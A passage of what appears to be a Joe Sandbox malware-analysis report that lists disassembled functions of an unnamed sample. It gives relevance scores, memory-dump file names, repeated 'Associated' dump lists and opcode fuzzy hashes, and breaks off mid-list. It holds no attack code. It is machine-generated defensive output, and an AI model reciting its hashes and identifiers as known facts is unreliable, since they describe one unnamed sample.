                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BI5
                                                                        • API String ID: 0-4216828115
                                                                        • Opcode ID: 45d680e32ee4b70db6fc13b18d796409a45d20cca58119e9c1a89fc4e6491a5c
                                                                        • Instruction ID: 127ca5dbb1980def6c834f5e7caddc668e347d21997048e65271a383dfc06e08
                                                                        • Opcode Fuzzy Hash: 45d680e32ee4b70db6fc13b18d796409a45d20cca58119e9c1a89fc4e6491a5c
                                                                        • Instruction Fuzzy Hash: 3EE101B5511B008FD326CF28D992B97B7E5FF06709F04886CE8AACB662D735B814CB54
                                                                        Function 0036CCD0 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: %*+(
                                                                        • API String ID: 2994545307-3233224373
                                                                        • Opcode ID: a95c3dbfc2cdbe330b51ad4d5ebe442234c789336d5db589cb757799caa9ab4b
                                                                        • Instruction ID: c0195448bee46a27548500f4a85e4f41b43175b65917c1f3cd18780a7ae7eb09
                                                                        • Opcode Fuzzy Hash: a95c3dbfc2cdbe330b51ad4d5ebe442234c789336d5db589cb757799caa9ab4b
                                                                        • Instruction Fuzzy Hash: 15B11F70A293418BD716DF58D880A3BFBF6EF85340F14982CE5C58B255E336E854CBA2
                                                                        Function 0035D457 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %*+(
                                                                        • API String ID: 0-3233224373
                                                                        • Opcode ID: 12e7a0a415654cf26aeb9857bf1120f316a7a9e8c8b198a49d7e0f9ea248772f
                                                                        • Instruction ID: 385b2308edb4a170e677521b165fd99ddfc5c636e77d8fc1cafa5962c14bcd71
                                                                        • Opcode Fuzzy Hash: 12e7a0a415654cf26aeb9857bf1120f316a7a9e8c8b198a49d7e0f9ea248772f
                                                                        • Instruction Fuzzy Hash: ED61F276908300DBD722EF18DC42A3AB3B4FF95355F490829F9858B261E332E915C792
                                                                        Function 00384A40 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %*+(
                                                                        • API String ID: 0-3233224373
                                                                        • Opcode ID: 2dd21dde2c5adb2f7479214eb17401685307f28beb7b7637ab7e8fa591de70ac
                                                                        • Instruction ID: a1b1a8cefe85fe016486950c2e681d473ce3e0606285c5be834d91153e55620b
                                                                        • Opcode Fuzzy Hash: 2dd21dde2c5adb2f7479214eb17401685307f28beb7b7637ab7e8fa591de70ac
                                                                        • Instruction Fuzzy Hash: CF61E3716083429BD717EF55C880B2AB7EAEBC4314F29899DE5C58B651D732EC40CB52
                                                                        Function 0034E1A0 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 0034E333
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                        • API String ID: 0-2471034898
                                                                        • Opcode ID: 4b74db7b81c05e6c2376885da3dfb6a88cd055f0a9bb290ee560e72e98e35184
                                                                        • Instruction ID: fbae05e3102889e5960115f41550fa6771d8edc1c57a7551d8ed4ccb2b409a23
                                                                        • Opcode Fuzzy Hash: 4b74db7b81c05e6c2376885da3dfb6a88cd055f0a9bb290ee560e72e98e35184
                                                                        • Instruction Fuzzy Hash: 10514737A596904BD32B993C5C512A97ACB2B92334F3EC7A9E9F18F3E0D5559C004390
                                                                        Function 00383920 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
